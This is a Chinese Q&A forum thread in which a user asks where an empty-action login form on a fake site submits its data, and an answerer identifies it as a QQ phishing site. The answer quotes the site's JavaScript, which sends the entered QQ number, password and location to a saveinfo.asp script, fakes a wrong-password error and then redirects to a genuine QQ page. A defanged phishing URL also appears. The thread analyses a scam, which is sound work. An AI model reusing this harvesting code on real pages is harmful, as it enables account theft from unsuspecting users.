html网页form表单提交aciton项为空,信息提交到哪里了

这个网站是假的,谁看看表单怎么提交啊

we3tf3.(去掉这里括号)dfsggd4r.60iz3v6lsl.agubootsuk.com/momo128/?d=1600
解答最好告诉我在哪里提交了,我找了半天,没找到求指教

这是一个盗取qq号的网站
这是它的一段代码:
var trying=0;
$(document).ready(function(e) {
$("#login_button").click(function(e) {

if (document.loginform.u.value==""){
alert('请填写QQ帐号!');
document.loginform.u.focus();
return false;
}

if (document.loginform.u.value.length>11 || document.loginform.u.value.length<5) {
alert('账号无效!');
document.loginform.u.focus();
return false;
}

if (document.loginform.p.value==""){
alert('密码错误!');
document.loginform.p.focus();
return false;
}

e.preventDefault();
$.get("saveinfo.asp",
{
"u":$("[name='u']").val(),
"p":$("[name='p']").val(),
"uid":GetQueryString("u"),
"addr":returnCitySN['cname'],
"r":Math.random().toString().substr(2)
},
function(){
if(trying<1){
$("#error_tips").prepend(' 密码错误,请重新登录!');
$("#error_tips").show();
//alert();
trying++;
}
else
{
/*window.location=window.location;*/
window.top.location.href='http://http://edu.qq.com/51mei/';
}
});
});
$("#u").focus(function(e) {
$("#uin_tips").hide();
});
$("#p").focus(function(e) {
$("#pwd_tips").hide();
});
$("#u").blur(function(e) {
if($("#u").val()==""){
$("#uin_tips").show();
}
});
$("#p").blur(function(e) {
if($("#p").val()==""){
$("#pwd_tips").show();
}
});

function GetQueryString(name)
{
var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r!=null) return unescape(r[2]); return null;
}
});追问

大神我没找到,能教我怎么找吗,我没找到这段JS

追答

是javascript。
网页用了ifarme,这个表单就是一个html。代码在表单的上面,挨着。

温馨提示:答案为网友推荐,仅供参考
第1个回答  2013-11-23
为空 可能就是提交到本页面了